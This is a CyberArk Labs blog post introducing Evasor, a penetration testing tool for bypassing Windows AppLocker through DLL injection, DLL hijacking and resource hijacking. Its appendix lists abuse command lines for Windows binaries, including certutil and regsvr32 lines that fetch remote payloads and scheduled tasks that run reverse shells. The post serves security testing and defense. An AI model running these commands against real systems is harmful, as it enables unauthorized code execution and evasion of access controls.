Introducing Evasor: A New Pen Test Tool for WindowAppLocker

June 18, 2020 Arik Kublanov

For anyone who may not be familiar, Windows AppLocker is an application whitelisting technology that allows administrators to control which executable files are allowed to be executed. With AppLocker, administrators create rules that allow or disallow the execution of certain files based on file names, publishers, file locations or hashes.

Today, we are going to discuss ways to bypass AppLocker black/white rules and present a new tool, developed by the CyberArk Labs team, called Evasor, which automatically implements those techniques – which will make penetration testing both much more effective and efficient.

What makes Evasor unique?

  • Scans processes that are vulnerable to DLL injection/hijacking and provides a live proof of concept.
  • Prints resource hijacking content without requiring the user to search for them manually.
  • Turns a manual job that can take days into an automated job that takes less than an hour.
  • • There’s no similar tool that we are aware of.
  • Creates the report for you.

Bypass AppLocker

Before we jump into Evasor, let’s first review the most common ways to bypass AppLocker rules:

  • Whitelisting – Since Microsoft’s signed executables are whitelisted by default, they can inherently be abused by allowing the execution of other programs and DLLs.
  • Blacklisting – Unless explicitly forbidden to do so, everything is allowed to execute by default, making blacklisting a common implementation.

The following techniques can be used to bypass some of the whitelisting and blacklisting approaches:

  • A whitelisted executable can be used as a delegate to launch an unapproved program. The list of executables and their descriptions can be found in the appendix and there is a link in the references below.

We can use the allowed executables on the machine to run our DLL’s, which implement an application that the AppLocker is supposed to block and uses it to bypass AppLocker.

  • DLL injection is a technique used for running code within the address space of another process by forcing it to load a dynamic-link library. DLL injection is often used by external programs to influence the behavior of another program in a way its authors did not anticipate or intended.

We can use the running process on the machine to inject (using mavinject.exe) our DLL’s, which implements an application that the AppLocker is supposed to block and uses it to bypass AppLocker.

  • DLL hijacking is a technique for executing an unexpected DLL on the machine. The DLL could be executed when the user/service runs an application that loads a DLL from an unprotected folder in which a malicious user replaced the existing DLL or added a DLL that does not exist in the folder. For further reading, you can find a link in the references below.

We can use an executable that the AppLocker permits to run to load our DLL’s, which implement an application that the AppLocker is supposed to block and uses it to bypass AppLocker.

  • Resource hijacking is a technique that allows an attacker to run arbitrary code in the context of the process that uses that resource. If this process is running with excessive privileges, then an attacker could abuse it in order to execute malicious code in the form of the file he had replaced on the resource. Files like xml,config,json,bat,cmd,ps1,vbs,ini, js,exe,dll,mui,msi,yaml,lib,inf,reg,log,htm exist on the disk and contain paths to other xml,config,json,bat,cmd,ps1,vbs,ini, js,exe,dll,mui,msi,yaml,lib,inf,reg,log,htm files that the executable is running. This technique’s purpose is to search the disk locations in which the user can write an unapproved program to a whitelisted location.

We can use an executable that the AppLocker permits to run that uses a resource file that contains other resources. If we want to edit the resource file, we can hijack the resource and execute our file. This implements an application that the AppLocker is supposed to block and uses it to bypass AppLocker.

Evasor usage

Remember the tv show MacGyver?

Every time MacGyver needed to escape from a room, he was able to use just the things available to him in that room to make his getaway. That is exactly what the Evasor tool does. It abuses executables and behaviors already on the Windows operating system to bypass Windows AppLocker rules.

Evasor main menu:

Figure 1 Evasor’s main menu.

Evasor’s features description:

Figure 2: Evasor features description.

For example, let say that AppLocker has a rule that denies the running of cmd.exe and powershell.exe.

Figure 3: AppLocker Rules Denies cmd.exe and powershell.exe.

When executing our scan with Evasor (option 1 on the Evasor menu) we can see that we can’t execute cmd.exe and powershell.exe due to the AppLocker rules.

Figure 4: AppLocker scan results.

So, let us use what we can find to help us run a command line and PowerShell from the below list:

Figure 5: AppLocker Scan results show what can be used to bypass restrictions.

We use msbuild.exe to bypass the AppLocker restriction to run powershell.exe.

Figure 6: PowerShell console using msbulid.exe.

We use mavinject.exe to scan process vulnerable to DLL injection to bypass AppLocker restriction on cmd.exe.

Figure 7: Scanning vulnerable process running to DLL injection using mavinject.exe.

We inject cmd.dll into OneDrive process and get our command-line console.

Figure 8 Mavinject.exe injecting to vulnerable OneDrive process cmd.dll.

Now, let’s bypass the restriction for cmd.exe using simple DLL Hijacking (option 2 on the Evasor menu).

As you can see, we executed the scan and the scanner detected that Procmon is running and placed it in a location the user has writing access – meaning the user can put or replace a DLL.

Figure 9 Procmon.exe Running from a Location the User has Write Access.

We activated Procmon.exe which is allowed by AppLocker but loads our cmd.dll — bypassing AppLocker restriction on cmd.exe.

Figure 10 Hijacking Procmon.exe to Load our cmd.dll

Now let’s finish with a final example of resource hijacking (option 3 on the Evasor menu in Figure 1).

When using this option, the tool will scan the entire machine disk and search for folders and inner folders that it can write to and map all possible files on the disk.

Figure 11: Scanning and mapping all Folders and files on disk

After the tool finishes, the files can be printed out and edited by the user and the rows – including any content that the user may have replaced with his own file or DLL – can be activated.

Figure 12: Output showing file and content that can be changed

Figure 13: Original file content to be changed.

We can edit this file; we just need to replace it in our DLL location.

Figure 14: File content changed to the attacker’s DLL

Remember this?

Figure 15: AppLocker scanning results shows cmtp.exe can be used to run inf file.

Since this executable can be used to run .inf files, we will use it to run the command line with restrictions on it.

Figure 16: Bypassing AppLocker rule by using cmtp.exe and inf resource hijacking.

After all of those demonstrations, you need to write a report….

Evasor saves you the pain of writing a report by automatically generating it for you (via option 4 on the Evasor menu) in a Word document.

Figure 17: Part of PT report generated by Evasor.

Here is a short video that illustrates how easy, quick and fun it is to use Evasor.

Figure 18: Evasor in action.

The Evasor is an automated penetration testing tool that abuses existing executables and behaviors on the windows operating system to bypass Windows AppLocker rules.

It is very easy to use, quick, saves time and is fully automated. The toolgenerates a report for you which includes a description, screenshots and suggested mitigations suited for both red and blue teams in the post- exploitation phase.

The uploaded code to Github is without the activation part implemented as shown on Figure 18.This part is being used internally in our labs. Blue teams are free to implement it as they see fit to their needs and tests.

  • You can download the tool at the following link: https://github.com/cyberark/Evasor/.
  • Our Red Team at CyberArk Labs will continue updating this tool with more new and improved features and automation.

REFERENCES

Appendix

Executable Path Executable Name Executable Description
C:\Windows\System32\
C:\Windows\SysWOW64\
regedit.exe Used by Windows to manipulate registry
regedit.exe
C:\Windows\System32\
C:\Windows\SysWOW64\
at.exe Schedule periodic tasks
at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su revshell.exe
C:\Windows\System32\
C:\Windows\SysWOW64\
reg.exe Used to manipulate the registry
reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
C:\Windows\System32\
C:\Windows\SysWOW64\
cmd.exe The command-line interpreter in Windows
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
C:\Windows\System32\
C:\Windows\SysWOW64\
winrm.cmd Windows Remote Management
winrm.exe invoke Create wmicimv2/Win32_Process @{CommandLine=”notepad.exe”} -r:http://target:5985
C:\Windows\System32\
C:\Windows\SysWOW64\
winrs.exe Windows Remote Shell
winrs.exe /r:myserver command
C:\Windows\System32\
C:\Windows\SysWOW64\
cmstp.exe Installs or removes a Connection Manager service profile
cmstp.exe /s PATH_TO\shell.inf
C:\Windows\System32\
C:\Windows\SysWOW64\
Mshta.exe Used by Windows to execute html applications. (.hta)
mshta.exe PATH_TO\shell.hta
C:\Windows\System32\
C:\Windows\SysWOW64\
control.exe Binary used to launch control panel items in Windows
control.exe PATH_TO\shell.dll
C:\Windows\System32\
C:\Windows\SysWOW64\
Cscript.exe Binary used to execute scripts in Windows
cscript.exe PATH_TO\shell.vbs
C:\Windows\System32\
C:\Windows\SysWOW64\
Wscript.exe Used by Windows to execute scripts
wscript.exe PATH_TO\shell.vbs
C:\Windows\System32\
C:\Windows\SysWOW64\
msiexec.exe Used by Windows to execute msi files
msiexec.exe /quiet /i PATH_TO\shell.msi
C:\Windows\System32\
C:\Windows\SysWOW64\
xwizard.exe Extensible Wizards Host Process
xwizard.exe argument1 argument2 DLL loading in same folder xwizard.dll
C:\Windows\System32\
C:\Windows\SysWOW64\
regedt32.exe Used by Windows to register dlls
regedt32.exe
C:\Windows\System32\
C:\Windows\SysWOW64\
Certutil.exe Windows binary used for handling certificates
certutil.exe -urlcache -split -f “http://x.x.x.x/shell.ps1” C:\Users\username\AppData\Local\Temp\shell. ps1
C:\Windows\System32\
C:\Windows\SysWOW64\
Odbcconf.exe Used in Windows for managing ODBC connections
odbcconf.exe-f PATH_TO\shell.rsp
C:\Windows\System32\
C:\Windows\SysWOW64\
SchTasks.exe Schedule periodic tasks
schtasks.exe /Create /SC HOURLY /TN RunShell /TR “shell.exe” && SCHTASKS /Run /I /TN RunShell
C:\Windows\System32\
C:\Windows\SysWOW64\
forfiles.exe Selects and executes a command on a file or set of files. This command is useful for batch processing
forfiles.exe /p c:\windows\system32 /m notepad.exe /c shell.exe
C:\Windows\System32\
C:\Windows\SysWOW64\
regsvr32.exe Used by Windows to register dlls
regsvr32.exe /s /n /u /i:http://example.com/file.sct PATH_TO\shell.dll
C:\Windows\System32\
C:\Windows\SysWOW64\
rundll32.exe Used by Windows to execute dll files
rundll32.exe PATH_TO\shell.dll
C:\Windows\System32\
C:\Windows\SysWOW64\
ATBroker.exe Helper binary for Assistive Technology (AT)
ATBroker.exe /start PATH_TO\shell
C:\Windows\System32\
C:\Windows\SysWOW64\
wmic.exe The WMI command-line (WMIC) utility provides a command-line interface for WMI
wmic.exe process call create calc.exe
C:\Windows\System32\
C:\Windows\SysWOW64\
Mavinject.exe Used by App-v in Windows, Inject file.dll stored as an Alternate Data Stream (ADS) into a process
mavInject32.exe /INJECTRUNNING PATH_TO\shell.dll
C:\Windows\System32\
C:\Windows\SysWOW64\
InfDefaultInstall.exe Binary used to perform installation based on content inside inf files
InfDefaultInstall.exe.shell.inf
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
csc.exe Binary file used by .NET to compile C# code
csc.exe /reference:”PATH_TO\System.Management.Automation.dll” /out: PATH_TO\pshell.dll PATH_TO\shell.cs
CC:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
Powershell.exe task automation and configuration management framework from Microsoft
powershell.exe -file PATH_TO\shell.ps1
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Regasm.exe Loads the target .DLL file and executes the RegisterClass function
regasm.exe /U PATH_TO\shell.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Regsvc.exe Regsvc and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
regsvc.exe /U PATH_TO\pshell.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
msbuild.exe Used to compile and execute code
msbuild.exe PATH_TO\shell.csproj
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
Powershell_ise.exe Windows PowerShell Integrated Scripting Environment (ISE)
powershell_ise.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
InstallUtil.exe The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
InstallUtil.exe /logfile= /LogToConsole=false /U PATH_TO\shell.dll
C:\Program Files (x86)\Microsoft
SDKs\F#\4.0\Framework\v4.0\
fsi.exe Interactive (fsi.exe) is used to run F# code interactively at the console, or to execute F# scripts. In other words, F# interactive executes a REPL (Read, Evaluate, Print Loop) for the F# language
fsi.exe PATH_TO\shell.fscript
C:\Program Files (x86)\Microsoft Web
Tools\DNX\dnx-clr-win-x86.1.0.0-beta8\bin\
C:\Program Files (x86)\Microsoft Web
Tools\DNX\dnx-coreclr-win-x64.1.0.0-beta8\bin\
dnx.exe The DNX Utility (dnu) tool is responsible for all operations involved with packages in your application
dnx.exe shell

Previous Article
Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing
Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing

Introduction With fileless malware becoming a ubiquitous feature of most modern Red Teams, knowledge in the...

Next Article
Group Policies Going Rogue
Group Policies Going Rogue

This blog –part of a year-long research project that uncovered 60 different vulnerabilities across major ve...

Check out our upcoming webinars!

See Webinars